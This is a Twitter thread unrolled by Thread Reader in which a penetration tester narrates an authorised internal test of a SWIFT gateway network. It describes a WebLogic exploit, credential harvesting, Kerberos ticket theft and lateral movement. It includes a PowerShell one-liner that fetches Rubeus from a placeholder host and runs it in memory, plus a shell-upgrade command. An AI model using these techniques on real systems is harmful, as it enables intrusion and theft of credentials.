Share this page!

root@alex:~/ # Profile picture
Twitter logo
May 4 23 tweets 5 min read
Good morning my fellow #infosec and other curious individuals! Today is day TWO of my <semi> live tweeted Internal Penetration Test with Acme. Updates to follow. Here's the thread from yesterday:
First things first, gotta get the house situated so that I can be undistracted. Let's grab some breakfast, reestablish my tunnels and start taking a look at overnight scanning data.
Oh and If anyone is interested, This is my base playlist:
music.youtube.com/playlist?list=…
BUT I click "Start Radio" so that it gets stuff like the playlist. :)
Looks like one of the Nessus scanners picked up a bunch of WebLogic/Tomcat issues overnight. This is common with SWIFT. Let's take a look and maybe get a shell?
That AsyncResponse Vuln in WebLogic never disappoints! Linux shell obtained!
Need a ghetto TTY?
python -c 'import pty; pty.spawn("/bin/bash")'
Need to do some privilege escalation. For the sake of time, we'll use LinEnum. (I'm aware there are a bazillion other options)
github.com/rebootuser/Lin…
I'm pretty sure it's an easy upgrade and this device is on the domain, so there's at least more I can do with it like 1/x
if it will allow me to login with the domain user I have, I may be able to escalate through that via some arbitrary policy that I've not discovered yet.
While enumerating stuff myself as the script is running, I found some passwords in ~/.bash_history! They don't work on any account on this device directly, but maybe in the domain?
That's a nope. Let's keep going.
Ok. Device wasn't connected to the domain, and there's no immediate way to root. Probably a ton of files that have juicy info in them, but we'll come back to it. There is another WebLogic server with this vulnerability. Let's hit that.
Ohh! This one is Windows, should be an instant SYSTEM shell if I can get it stable.
Was not a SYSTEM shell. But it did get me another user. Looks like this user has the ability to escalate to high-integrity:
Meterpreter is being killed immediately, so currently I'm just stuck with a shell. @zerosum0x0 created an awesome tool called Koadic, and I forked it when they took their leave of absence. I didn't really modify it.
github.com/offsecginger/k…
This should be enough to dump lsass
@zerosum0x0 Ok. So even Koadic is getting eaten. No worries. We can do this with something else. I'll hold off on using Cobalt Strike for now.
@zerosum0x0 Ok had to step away for a second to marvel at the realization of what device I'm actually on. I can see every single SWIFT message before it's sent to the autoclient. Hell, I think I can manipulate them too. Screw it. I'm standing up Cobalt Strike.
@zerosum0x0 Lunch break! Be back shortly!
Ok. Back. That was annoying, and Cobalt Strike isn't needed. I just decided to exhaust different avenues of getting a solid shell. I was unsuccessful. BUT! Here's what I DO have now:
- Weak CMDShell
- A local Admin user I created (unneeded now)
- Valid TGT's for domain users! 1/x
I was successful in using the Weak CMDShell I got from exploiting WebLogic to execute Rubeus in memory. Check this out:
2/x
powershell.exe -c "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://x.x.x.x/rubeus' -UseBasicParsing | Select-Object -ExpandProperty Content));[Rubeus.Program]::Main('triage')"
More DNS trouble. Back on track now! I think my next step will be to escalate in the domain. Playing with these half-privileges is causing more trouble than it's worth.
I stole one of the TGTs from this SWIFT device and used it against the only device that the user was Local Admin on. SMBExec'd and now I have a SYSTEM shell on a device!
Ok that's going to be all for the day! I was able to dump some hashes with CrackMapExec (which gave me a cleartext password), sprayed that and it gave me 3 more accounts, which gave me one more device to dump LSA. Pulling threads, I tell ya!
Speaking of:

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with root@alex:~/ #

root@alex:~/ # Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @offsec_ginger

root@alex:~/ # Profile picture
May 3
I'm going to <semi> live tweet this Internal Penetration Test. Calling the company Acme
Important notes:
Assumed Breach (Already have a Debian based image, no creds, but solely for the sake of having tools locally)
Landing in the SWIFT gateway network
Flags: DA/SWIFT 1/x
Non-Evasive (we can sound alarms, they're only monitoring and validating our actions, this is not a purple team assessment to fill gaps in their NIPS)
Crystal/Glass/Full-Disclosure whatever your org calls "we'll give you any info you need to progress in terms of network topology"
Starting off with good old Nessus/Nmap one-two punch against the in-scope ranges provided to us during our kick off. #nessus #nmap
Read 33 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(